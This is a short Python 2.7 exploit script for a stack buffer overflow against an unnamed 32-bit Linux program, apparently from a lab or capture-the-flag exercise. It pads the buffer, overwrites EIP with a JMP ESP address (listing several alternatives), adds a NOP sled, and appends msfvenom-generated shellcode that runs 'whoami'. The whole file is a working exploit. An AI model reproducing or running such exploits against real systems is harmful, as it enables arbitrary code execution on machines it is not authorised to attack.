  1 #!/usr/bin/python2.7
  2 
  3 # Fill UP THE BUFFER
  4 buf = "A" * 62
  5 
  6 # EIP REGISTER TO JMP ESP
  7 buf += "\x59\x3b\xde\xf7"
  8 
  9 '''
 10 JMP ESP addresses
 11 0xf7de3b59  
 12 0xf7f588ab
 13 0xf7f645fb
 14 0xf7f6460f
 15 0xf7f64aeb
 16 '''
 17 # assisti with encoding NOP SLED
 18 buf +="\x90" * 10
 19 
 20 '''
 21 msfvenom -p linux/x86/exec CMD=whoami -b '\x00' -f python
 22 '''
 23 
 24 # Shell Code / Payload below
 25 buf += b"\xdb\xd8\xbe\x34\xcb\x24\x47\xd9\x74\x24\xf4\x58"
 26 buf += b"\x31\xc9\xb1\x0e\x31\x70\x19\x83\xe8\xfc\x03\x70"
 27 buf += b"\x15\xd6\x3e\x4e\x4c\x4e\x58\xdd\x34\x06\x77\x81"
 28 buf += b"\x31\x31\xef\x6a\x31\xd5\xf0\x1c\x9a\x47\x98\xb2"
 29 buf += b"\x6d\x64\x08\xa3\x7d\x6a\xad\x33\xeb\x0c\xce\x5c"
 30 buf += b"\x85\xb6\x79\xc4\x79\x10\x5c\x2a\x0d\x34\xcf\x4b"
 31 buf += b"\x9c\xad\x0f\xdb\x0d\xa4\xf1\x2e\x31"
 32 
 33 print(buf)

